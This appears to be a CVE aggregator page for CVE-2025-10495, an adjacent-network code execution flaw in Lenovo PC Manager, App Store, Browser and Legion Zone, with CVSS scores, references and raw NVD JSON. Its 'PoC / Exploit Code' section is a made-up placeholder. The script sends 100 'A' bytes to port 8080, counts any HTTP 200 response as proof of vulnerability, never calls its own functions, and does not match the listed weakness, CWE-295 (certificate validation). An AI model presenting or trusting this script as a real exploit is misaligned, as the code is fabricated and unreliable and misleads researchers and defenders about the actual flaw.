CVE-2025-10495

Description

A potential vulnerability was reported in the Lenovo PC Manager, Lenovo App Store, Lenovo Browser, and Lenovo Legion Zone client applications that, under certain conditions, could allow an attacker on the same logical network to execute arbitrary code.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Lenovo PC Manager（受影响的版本需查询联想官方安全公告）

Lenovo App Store（受影响的版本需查询联想官方安全公告）

Lenovo Browser（受影响的版本需查询联想官方安全公告）

Lenovo Legion Zone（受影响的版本需查询联想官方安全公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10495 PoC - Lenovo Applications RCE via Adjacent Network
# This PoC demonstrates the network-based attack vector
# Note: For authorized security testing only

import socket
import struct
import requests

def create_malicious_payload():
    """Generate malicious payload for code execution"""
    # Example payload structure (actual payload depends on specific vulnerability)
    payload = b'\x41' * 100  # Placeholder for actual exploit
    return payload

def send_exploit(target_ip, target_port=8080):
    """Send exploit to vulnerable Lenovo application"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        payload = create_malicious_payload()
        s.send(payload)
        
        response = s.recv(1024)
        print(f"Received response: {response}")
        s.close()
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False

def check_vulnerability(target_url):
    """Check if target Lenovo application is vulnerable"""
    try:
        # Example check - actual implementation may vary
        response = requests.get(target_url, timeout=10)
        if response.status_code == 200:
            return True
    except:
        pass
    return False

if __name__ == "__main__":
    print("CVE-2025-10495 - Lenovo Applications RCE PoC")
    print("Target: Lenovo PC Manager, App Store, Browser, Legion Zone")
    print("Attack Vector: Adjacent Network (AV:A)")
    print("CVSS Score: 7.5 (High)")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10495
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10495
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10495/
[4] VulDB https://vuldb.com/cve/CVE-2025-10495
[5] https://iknow.lenovo.com.cn/detail/434328

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10495", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:35.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A potential vulnerability was reported in the Lenovo PC Manager, Lenovo App Store, Lenovo Browser, and Lenovo Legion Zone client applications that, under certain conditions, could allow an attacker on the same logical network to execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/434328", "source": "[email protected]"}]}}